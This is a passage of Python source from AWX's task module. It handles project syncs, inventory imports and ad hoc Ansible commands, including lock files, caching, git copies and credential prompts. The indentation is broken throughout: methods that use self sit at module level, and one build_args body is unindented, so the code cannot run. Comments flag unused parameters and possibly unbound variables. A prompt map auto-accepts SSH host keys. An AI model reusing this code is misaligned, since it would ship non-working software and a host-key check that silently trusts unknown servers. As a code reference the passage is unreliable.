            scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
        else:
            scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
        # Pass the extra accept_hostkey parameter to the git module.
        if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
            extra_vars['scm_accept_hostkey'] = 'true'
        return scm_url, extra_vars
    def build_inventory(self, instance, private_data_dir):
        # Project updates always run against localhost only.
        return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
    def build_extra_vars_file(self, project_update, private_data_dir):
        """
        Write the extra vars consumed by the project_update playbook: SCM
        url/branch/auth details plus AWX deployment metadata and Galaxy
        role/collection toggles.
        """
        extra_vars = {}
        scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
        extra_vars.update(extra_vars_new)

        scm_branch = project_update.scm_branch
        if project_update.job_type == 'run' and (not project_update.branch_override):
            # Job-dependency sync without override: pin to the known revision.
            if project_update.project.scm_revision:
                scm_branch = project_update.project.scm_revision
            elif not scm_branch:
                raise RuntimeError('Could not determine a revision to run from project.')
        elif not scm_branch:
            scm_branch = 'HEAD'

        galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
        if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
            logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')

        extra_vars.update(
            {
                'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
                'local_path': os.path.basename(project_update.project.local_path),
                'project_path': project_update.get_project_path(check_if_exists=False),  # deprecated
                'insights_url': settings.INSIGHTS_URL_BASE,
                'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
                'awx_version': get_awx_version(),
                'scm_url': scm_url,
                'scm_branch': scm_branch,
                'scm_clean': project_update.scm_clean,
                'scm_track_submodules': project_update.scm_track_submodules,
                'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
                'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
            }
        )
        # apply custom refspec from user for PR refs and the like
        if project_update.scm_refspec:
            extra_vars['scm_refspec'] = project_update.scm_refspec
        elif project_update.project.allow_override:
            # If branch is override-able, do extra fetch for all branches
            extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'

        if project_update.scm_type == 'archive':
            # for raw archive, prevent error moving files between volumes
            extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')

        self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
    def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
        """
        After this project update, run an inventory update for each SCM
        inventory source configured with update_on_project_update — skipping
        sources whose last-synced revision is already current or that have
        another update active.
        """
        scm_revision = project_update.project.scm_revision
        inv_update_class = InventoryUpdate._get_task_class()
        for inv_src in dependent_inventory_sources:
            if not inv_src.update_on_project_update:
                continue
            if inv_src.scm_last_revision == scm_revision:
                logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
                continue
            logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
            # Create the update record atomically so the active-update check
            # and creation can't race with another worker.
            with transaction.atomic():
                if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
                    logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
                    continue
                local_inv_update = inv_src.create_inventory_update(
                    _eager_fields=dict(
                        launch_type='scm',
                        status='running',
                        instance_group=project_update.instance_group,
                        execution_node=project_update.execution_node,
                        source_project_update=project_update,
                        celery_task_id=project_update.celery_task_id,
                    )
                )
            try:
                inv_update_class().run(local_inv_update.id)
            except Exception:
                # Keep processing the remaining sources even if one blows up
                logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))

            try:
                project_update.refresh_from_db()
            except ProjectUpdate.DoesNotExist:
                # Parent update was deleted out from under us; stop entirely.
                logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
                break
            try:
                local_inv_update.refresh_from_db()
            except InventoryUpdate.DoesNotExist:
                logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
                continue
            if project_update.cancel_flag:
                logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
                break
            if local_inv_update.cancel_flag:
                logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
            if local_inv_update.status == 'successful':
                # Record the revision so this source is skipped next time
                inv_src.scm_last_revision = scm_revision
                inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
    """Unlock and close the project lock file taken by acquire_lock.

    On an unlock failure the descriptor is still closed before the error
    propagates, so no fd is leaked; ``self.lock_fd`` is cleared only on the
    success path.
    """
    try:
        fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
    except IOError as e:
        logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
        os.close(self.lock_fd)
        raise
    else:
        os.close(self.lock_fd)
        self.lock_fd = None
def acquire_lock(self, instance, blocking=True):
    """Take an exclusive flock on the project's lock file.

    Polls once per second (non-blocking lockf in a loop) so that a cancel of
    the project update is noticed while waiting. Returns early without the
    lock if ``instance.cancel_flag`` becomes set.

    Note: We don't support blocking=False.

    :param instance: the ProjectUpdate to lock
    :param blocking: accepted for interface compatibility; only True supported
    :raises RuntimeError: if no lock file path can be determined
    :raises OSError: if the lock file cannot be opened
    :raises IOError: on unexpected lockf failures
    """
    lock_path = instance.get_lock_file()
    if lock_path is None:
        # If from migration or someone blanked local_path for any other reason, recoverable by save
        instance.save()
        lock_path = instance.get_lock_file()
        if lock_path is None:
            raise RuntimeError(u'Invalid lock file path')
    try:
        self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
    except OSError as e:
        logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
        raise
    start_time = time.time()
    while True:
        try:
            # Re-check cancellation each second so a canceled update does not
            # sit here holding a worker.
            instance.refresh_from_db(fields=['cancel_flag'])
            if instance.cancel_flag:
                logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
                return
            fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
            break
        except IOError as e:
            if e.errno not in (errno.EAGAIN, errno.EACCES):
                # Unexpected failure: close the fd so it does not leak.
                os.close(self.lock_fd)
                logger.error("I/O error({0}) while trying to acquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
                raise
            else:
                # Lock held by another update; wait and retry.
                time.sleep(1.0)
    waiting_time = time.time() - start_time
    if waiting_time > 1.0:
        logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
    """Prepare the filesystem before a project update runs.

    Ensures the project root and project folder exist, takes the project
    lock, remembers the checked-out branch for later restoration, resets
    the roles/collections staging cache, and copies the AWX project-update
    playbooks into the runner's project directory.
    """
    super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
    # re-create root project folder if a natural disaster has destroyed it
    if not os.path.exists(settings.PROJECTS_ROOT):
        os.mkdir(settings.PROJECTS_ROOT)
    project_path = instance.project.get_project_path(check_if_exists=False)
    if not os.path.exists(project_path):
        os.makedirs(project_path)  # used as container mount
    # Serializes concurrent updates of the same project; released in post_run_hook.
    self.acquire_lock(instance)
    self.original_branch = None
    if instance.scm_type == 'git' and instance.branch_override:
        # Remember what the repo had checked out so post_run_hook can restore it.
        if os.path.exists(project_path):
            git_repo = git.Repo(project_path)
            if git_repo.head.is_detached:
                self.original_branch = git_repo.head.commit
            else:
                self.original_branch = git_repo.active_branch
    # Always start from an empty staging area for roles/collections downloads.
    stage_path = os.path.join(instance.get_cache_path(), 'stage')
    if os.path.exists(stage_path):
        logger.warning('{0} unexpectedly existed before update'.format(stage_path))
        shutil.rmtree(stage_path)
    os.makedirs(stage_path)  # presence of empty cache indicates lack of roles or collections
    # the project update playbook is not in a git repo, but uses a vendoring directory
    # to be consistent with the ansible-runner model,
    # that is moved into the runner project folder here
    awx_playbooks = self.get_path_to('..', 'playbooks')
    copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
    """Remove every cache entry under ``cache_dir`` except ``keep_value`` and 'stage'.

    Each doomed entry is first renamed to an invalidation name and then
    deleted, so a half-finished removal is never mistaken for a valid cache.
    Removal failures are logged and skipped rather than raised.
    """
    if not os.path.isdir(cache_dir):
        return
    for entry in os.listdir(cache_dir):
        if entry in (keep_value, 'stage'):
            continue
        doomed = os.path.join(cache_dir, entry)
        # invalidate, then delete
        invalidated = os.path.join(cache_dir, '.~~delete~~' + entry)
        try:
            os.rename(doomed, invalidated)
            shutil.rmtree(invalidated)
        except OSError:
            logger.warning(f"Could not remove cache directory {doomed}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
    """Copy project content (roles and collections) to a job private_data_dir

    :param object p: Either a project or a project update
    :param str job_private_data_dir: The root of the target ansible-runner folder
    :param str scm_revision: For branch_override cases, the git revision to copy
    """
    project_path = p.get_project_path(check_if_exists=False)
    destination_folder = os.path.join(job_private_data_dir, 'project')
    if not scm_revision:
        scm_revision = p.scm_revision
    # NOTE(review): the local ``scm_revision`` above is never used below —
    # the clone pins ``p.scm_revision`` directly. Confirm whether the
    # parameter was meant to feed ``create_head`` for branch_override cases.
    if p.scm_type == 'git':
        git_repo = git.Repo(project_path)
        if not os.path.exists(destination_folder):
            # Owner-only rwx on the copied project folder.
            os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
        # Temporary uniquely-named branch so the clone can target the exact
        # revision; deleted again below.
        tmp_branch_name = 'awx_internal/{}'.format(uuid4())
        # always clone based on specific job revision
        if not p.scm_revision:
            raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
        source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
        # git clone must take file:// syntax for source repo or else options like depth will be ignored
        source_as_uri = Path(project_path).as_uri()
        git.Repo.clone_from(
            source_as_uri,
            destination_folder,
            branch=source_branch,
            depth=1,
            single_branch=True,  # shallow, do not copy full history
        )
        # submodules copied in loop because shallow copies from local HEADs are ideal
        # and no git clone submodule options are compatible with minimum requirements
        for submodule in git_repo.submodules:
            subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
            subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
            subrepo_uri = Path(subrepo_path).as_uri()
            git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
        # force option is necessary because remote refs are not counted, although no information is lost
        git_repo.delete_head(tmp_branch_name, force=True)
    else:
        # Non-git projects: plain recursive copy, keeping symlinks as links.
        copy_tree(project_path, destination_folder, preserve_symlinks=1)
    # copy over the roles and collection cache to job folder
    cache_path = os.path.join(p.get_cache_path(), p.cache_id)
    subfolders = []
    if settings.AWX_COLLECTIONS_ENABLED:
        subfolders.append('requirements_collections')
    if settings.AWX_ROLES_ENABLED:
        subfolders.append('requirements_roles')
    for subfolder in subfolders:
        cache_subpath = os.path.join(cache_path, subfolder)
        if os.path.exists(cache_subpath):
            dest_subpath = os.path.join(job_private_data_dir, subfolder)
            copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
            logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
    """Finalize a project update: persist revision, promote the staged
    roles/collections cache, copy the project for a dependent job, restore
    the original git branch, release the project lock, and (for 'check'
    runs) sync project metadata and dependent SCM inventory sources.
    """
    super(RunProjectUpdate, self).post_run_hook(instance, status)
    # To avoid hangs, very important to release lock even if errors happen here
    try:
        if self.playbook_new_revision:
            instance.scm_revision = self.playbook_new_revision
            instance.save(update_fields=['scm_revision'])
        # Roles and collection folders copy to durable cache
        base_path = instance.get_cache_path()
        stage_path = os.path.join(base_path, 'stage')
        if status == 'successful' and 'install_' in instance.job_tags:
            # Clear other caches before saving this one, and if branch is overridden
            # do not clear cache for main branch, but do clear it for other branches
            self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
            cache_path = os.path.join(base_path, instance.cache_id)
            if os.path.exists(stage_path):
                if os.path.exists(cache_path):
                    logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
                    shutil.rmtree(cache_path)
                # Atomic promotion of the staged downloads to the durable cache.
                os.rename(stage_path, cache_path)
                logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
        elif os.path.exists(stage_path):
            shutil.rmtree(stage_path)  # cannot trust content update produced
        if self.job_private_data_dir:
            if status == 'successful':
                # copy project folder before resetting to default branch
                # because some git-tree-specific resources (like submodules) might matter
                self.make_local_copy(instance, self.job_private_data_dir)
            if self.original_branch:
                # for git project syncs, non-default branches can be problems
                # restore to branch the repo was on before this run
                try:
                    self.original_branch.checkout()
                except Exception:
                    # this could have failed due to dirty tree, but difficult to predict all cases
                    logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
    finally:
        self.release_lock(instance)
    p = instance.project
    if instance.job_type == 'check' and status not in (
        'failed',
        'canceled',
    ):
        if self.playbook_new_revision:
            p.scm_revision = self.playbook_new_revision
        else:
            if status == 'successful':
                logger.error("{} Could not find scm revision in check".format(instance.log_format))
        p.playbook_files = p.playbooks
        p.inventory_files = p.inventories
        p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
    # Update any inventories that depend on this project
    dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
    if len(dependent_inventory_sources) > 0:
        if status == 'successful' and instance.launch_type != 'sync':
            self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
    """Extend base EE params with bind mounts for the project tree and its
    roles/collections cache; on Kubernetes no mounts apply, so return {}.
    """
    if settings.IS_K8S:
        return {}
    params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
    mounts = params.setdefault('container_volume_mounts', [])
    # Mount each host path at the identical path inside the container.
    for host_path in (
        instance.get_project_path(check_if_exists=False),
        instance.get_cache_path(),
    ):
        mounts.append(f"{host_path}:{host_path}:Z")
    return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
    """Run an inventory update: execute ``ansible-inventory`` against the
    configured source and import the resulting JSON into the database.
    """

    model = InventoryUpdate
    event_model = InventoryUpdateEvent
    event_data_key = 'inventory_update_id'

    def build_private_data(self, inventory_update, private_data_dir):
        """
        Return private data needed for inventory update.

        Returns a dict of the form

        {
            'credentials': {
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
            }
        }

        If no private data is needed, return None.
        """
        if inventory_update.source in InventorySource.injectors:
            injector = InventorySource.injectors[inventory_update.source]()
            return injector.build_private_data(inventory_update, private_data_dir)

    def build_env(self, inventory_update, private_data_dir, private_data_files=None):
        """Build environment dictionary for ansible-inventory.

        Most environment variables related to credentials or configuration
        are accomplished by the inventory source injectors (in this method)
        or custom credential type injectors (in main run method).
        """
        env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
        if private_data_files is None:
            private_data_files = {}
        # Pass inventory source ID to inventory script.
        env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
        env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
        env.update(STANDARD_INVENTORY_UPDATE_ENV)
        injector = None
        if inventory_update.source in InventorySource.injectors:
            injector = InventorySource.injectors[inventory_update.source]()
        if injector is not None:
            env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
            # All CLOUD_PROVIDERS sources implement as inventory plugin from collection
            env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
        if inventory_update.source == 'scm':
            # SCM sources may pass through user-supplied environment variables,
            # except those on the configured block list.
            for env_k in inventory_update.source_vars_dict:
                if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
                    env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
        elif inventory_update.source == 'file':
            raise NotImplementedError('Cannot update file sources through the task system.')
        if inventory_update.source == 'scm' and inventory_update.source_project_update:
            # Prepend the project's synced collections folder to the
            # collections path so project requirements win over defaults.
            env_key = 'ANSIBLE_COLLECTIONS_PATHS'
            config_setting = 'collections_paths'
            folder = 'requirements_collections'
            default = '~/.ansible/collections:/usr/share/ansible/collections'
            config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
            paths = default.split(':')
            # NOTE(review): this prepends the *entire* pre-existing value once
            # per unseen path component; preserved as-is — confirm intent.
            if env_key in env:
                for path in env[env_key].split(':'):
                    if path not in paths:
                        paths = [env[env_key]] + paths
            elif config_setting in config_values:
                for path in config_values[config_setting].split(':'):
                    if path not in paths:
                        paths = [config_values[config_setting]] + paths
            paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
            env[env_key] = os.pathsep.join(paths)
        return env

    def write_args_file(self, private_data_dir, args):
        """Write the command line to the runner 'args' file, owner-read-only."""
        path = os.path.join(private_data_dir, 'args')
        handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
        f = os.fdopen(handle, 'w')
        f.write(' '.join(args))
        f.close()
        os.chmod(path, stat.S_IRUSR)
        return path

    def build_args(self, inventory_update, private_data_dir, passwords):
        """Build the command line argument list for running an inventory
        import.
        """
        # Get the inventory source and inventory.
        inventory_source = inventory_update.inventory_source
        inventory = inventory_source.inventory
        if inventory is None:
            raise RuntimeError('Inventory Source is not associated with an Inventory.')
        args = ['ansible-inventory', '--list', '--export']
        # Add arguments for the source inventory file/script/thing
        rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
        container_location = os.path.join(CONTAINER_ROOT, rel_path)
        source_location = os.path.join(private_data_dir, rel_path)
        args.append('-i')
        args.append(container_location)
        # Output goes to the artifacts subfolder keyed by this update's id;
        # post_run_hook reads this same file back on the host side.
        args.append('--output')
        args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
        if os.path.isdir(source_location):
            playbook_dir = container_location
        else:
            playbook_dir = os.path.dirname(container_location)
        args.extend(['--playbook-dir', playbook_dir])
        if inventory_update.verbosity:
            args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
        return args

    def build_inventory(self, inventory_update, private_data_dir):
        return None  # what runner expects in order to not deal with inventory

    def pseudo_build_inventory(self, inventory_update, private_data_dir):
        """Inventory imports are ran through a management command
        we pass the inventory in args to that command, so this is not considered
        to be "Ansible" inventory (by runner) even though it is
        Eventually, we would like to cut out the management command,
        and thus use this as the real inventory
        """
        src = inventory_update.source
        injector = None
        if inventory_update.source in InventorySource.injectors:
            injector = InventorySource.injectors[src]()
        if injector is not None:
            content = injector.inventory_contents(inventory_update, private_data_dir)
            # must be a statically named file
            inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
            with open(inventory_path, 'w') as f:
                f.write(content)
            os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
            rel_path = os.path.join('inventory', injector.filename)
        elif src == 'scm':
            rel_path = os.path.join('project', inventory_update.source_path)
        # NOTE(review): a source with no injector that is not 'scm' would leave
        # rel_path unbound; appears unreachable for supported sources — confirm.
        return rel_path

    def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
        # Inventory updates run no playbook.
        return None

    def build_credentials_list(self, inventory_update):
        # All credentials not used by inventory source injector
        return inventory_update.get_extra_credentials()

    def pre_run_hook(self, inventory_update, private_data_dir):
        """For SCM-backed sources, sync (or copy) the source project so its
        content is available in the runner folder before ansible-inventory runs.
        """
        super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
        source_project = None
        if inventory_update.inventory_source:
            source_project = inventory_update.inventory_source.source_project
        if (
            inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
        ):  # never ever update manual projects
            # Check if the content cache exists, so that we do not unnecessarily re-download roles
            sync_needs = ['update_{}'.format(source_project.scm_type)]
            has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
            # Galaxy requirements are not supported for manual projects
            if not has_cache:
                sync_needs.extend(['install_roles', 'install_collections'])
            local_project_sync = source_project.create_project_update(
                _eager_fields=dict(
                    launch_type="sync",
                    job_type='run',
                    job_tags=','.join(sync_needs),
                    status='running',
                    execution_node=inventory_update.execution_node,
                    instance_group=inventory_update.instance_group,
                    celery_task_id=inventory_update.celery_task_id,
                )
            )
            # associate the inventory update before calling run() so that a
            # cancel() call on the inventory update can cancel the project update
            local_project_sync.scm_inventory_updates.add(inventory_update)
            project_update_task = local_project_sync._get_task_class()
            try:
                sync_task = project_update_task(job_private_data_dir=private_data_dir)
                sync_task.run(local_project_sync.id)
                local_project_sync.refresh_from_db()
                inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
                inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
            except Exception:
                # Mark the inventory update failed with a pointer at the sync
                # that broke, then let the error propagate.
                inventory_update = self.update_model(
                    inventory_update.pk,
                    status='failed',
                    job_explanation=(
                        'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
                        % ('project_update', local_project_sync.name, local_project_sync.id)
                    ),
                )
                raise
        elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
            # This follows update, not sync, so make copy here
            RunProjectUpdate.make_local_copy(source_project, private_data_dir)

    def post_run_hook(self, inventory_update, status):
        """On success, load the ansible-inventory JSON output and import it
        into the database via the inventory_import management command.
        """
        super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
        if status != 'successful':
            return  # nothing to save, step out of the way to allow error reporting
        private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
        # FIX: read from the same per-update subfolder that build_args passed
        # to --output (artifacts/<id>/output.json); previously the id segment
        # was missing, so the file written by ansible-inventory was never found.
        expected_output = os.path.join(private_data_dir, 'artifacts', str(inventory_update.id), 'output.json')
        with open(expected_output) as f:
            data = json.load(f)
        # build inventory save options
        options = dict(
            overwrite=inventory_update.overwrite,
            overwrite_vars=inventory_update.overwrite_vars,
        )
        src = inventory_update.source
        if inventory_update.enabled_var:
            options['enabled_var'] = inventory_update.enabled_var
            options['enabled_value'] = inventory_update.enabled_value
        else:
            # Fall back to per-source settings, e.g. EC2_ENABLED_VAR.
            if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
                options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
            if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
                options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
        if inventory_update.host_filter:
            options['host_filter'] = inventory_update.host_filter
        if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
            options['exclude_empty_groups'] = True
        if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
            options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
        # Verbosity is applied to saving process, as well as ansible-inventory CLI option
        if inventory_update.verbosity:
            options['verbosity'] = inventory_update.verbosity
        # Route the import command's log output through the job event stream.
        handler = SpecialInventoryHandler(
            self.event_handler,
            self.cancel_callback,
            verbosity=inventory_update.verbosity,
            job_timeout=self.get_instance_timeout(self.instance),
            start_time=inventory_update.started,
            counter=self.event_ct,
            initial_line=self.end_line,
        )
        inv_logger = logging.getLogger('awx.main.commands.inventory_import')
        formatter = inv_logger.handlers[0].formatter
        formatter.job_start = inventory_update.started
        handler.formatter = formatter
        inv_logger.handlers[0] = handler
        from awx.main.management.commands.inventory_import import Command as InventoryImportCommand

        cmd = InventoryImportCommand()
        try:
            # save the inventory data to database.
            # canceling exceptions will be handled in the global post_run_hook
            cmd.perform_update(options, data, inventory_update)
        except PermissionDenied as exc:
            logger.exception('License error saving {} content'.format(inventory_update.log_format))
            raise PostRunError(str(exc), status='error')
        except PostRunError:
            logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
            raise
        except Exception:
            logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
            raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
    """
    Run an ad hoc command using ansible.
    """

    model = AdHocCommand
    event_model = AdHocCommandEvent
    event_data_key = 'ad_hoc_command_id'

    def build_private_data(self, ad_hoc_command, private_data_dir):
        """
        Return SSH private key data needed for this ad hoc command (only if
        stored in DB as ssh_key_data).

        Returns a dict of the form

        {
            'credentials': {
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                ...
            },
            'certificates': {
                <awx.main.models.Credential>: <signed SSH certificate data>,
                <awx.main.models.Credential>: <signed SSH certificate data>,
                ...
            }
        }
        """
        # If we were sent SSH credentials, decrypt them and send them
        # back (they will be written to a temporary file).
        creds = ad_hoc_command.credential
        private_data = {'credentials': {}}
        if creds and creds.has_input('ssh_key_data'):
            private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
        if creds and creds.has_input('ssh_public_key_data'):
            private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
        return private_data

    def build_passwords(self, ad_hoc_command, runtime_passwords):
        """
        Build a dictionary of passwords for SSH private key, SSH user and
        sudo/su.
        """
        passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
        cred = ad_hoc_command.credential
        if cred:
            for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
                # Runtime-supplied values win over stored credential inputs;
                # the stored field for ssh_password is named 'password'.
                value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
                if value not in ('', 'ASK'):
                    passwords[field] = value
        return passwords

    def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
        """
        Build environment dictionary for ansible.
        """
        env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
        # Set environment variables needed for inventory and ad hoc event
        # callbacks to work.
        env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
        env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
        env['INVENTORY_HOSTVARS'] = str(True)
        env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
        env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
        return env

    def build_args(self, ad_hoc_command, private_data_dir, passwords):
        """
        Build command line argument list for running ansible, optionally using
        ssh-agent for public/private key authentication.
        """
        creds = ad_hoc_command.credential
        ssh_username, become_username, become_method = '', '', ''
        if creds:
            ssh_username = creds.get_input('username', default='')
            become_method = creds.get_input('become_method', default='')
            become_username = creds.get_input('become_username', default='')
        # (A redundant else branch that re-assigned the already-empty
        # become_method/become_username was removed; both are only used in
        # truthiness tests below, so behavior is unchanged.)
        # Always specify the normal SSH user as root by default. Since this
        # task is normally running in the background under a service account,
        # it doesn't make sense to rely on ansible's default of using the
        # current user.
        ssh_username = ssh_username or 'root'
        args = []
        if ad_hoc_command.job_type == 'check':
            args.append('--check')
        args.extend(['-u', sanitize_jinja(ssh_username)])
        if 'ssh_password' in passwords:
            args.append('--ask-pass')
        # We only specify sudo/su user and password if explicitly given by the
        # credential. Credential should never specify both sudo and su.
        if ad_hoc_command.become_enabled:
            args.append('--become')
        if become_method:
            args.extend(['--become-method', sanitize_jinja(become_method)])
        if become_username:
            args.extend(['--become-user', sanitize_jinja(become_username)])
        if 'become_password' in passwords:
            args.append('--ask-become-pass')
        if ad_hoc_command.forks:  # FIXME: Max limit?
            args.append('--forks=%d' % ad_hoc_command.forks)
        if ad_hoc_command.diff_mode:
            args.append('--diff')
        if ad_hoc_command.verbosity:
            args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
        # Validate extra_vars here so prohibited variables fail fast; the
        # variables themselves are written by build_extra_vars_file.
        extra_vars = ad_hoc_command.awx_meta_vars()
        if ad_hoc_command.extra_vars_dict:
            redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
            if removed_vars:
                raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
            extra_vars.update(ad_hoc_command.extra_vars_dict)
        if ad_hoc_command.limit:
            args.append(ad_hoc_command.limit)
        else:
            args.append('all')
        return args

    def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
        """Write AWX meta vars plus user extra_vars, rejecting prohibited ones."""
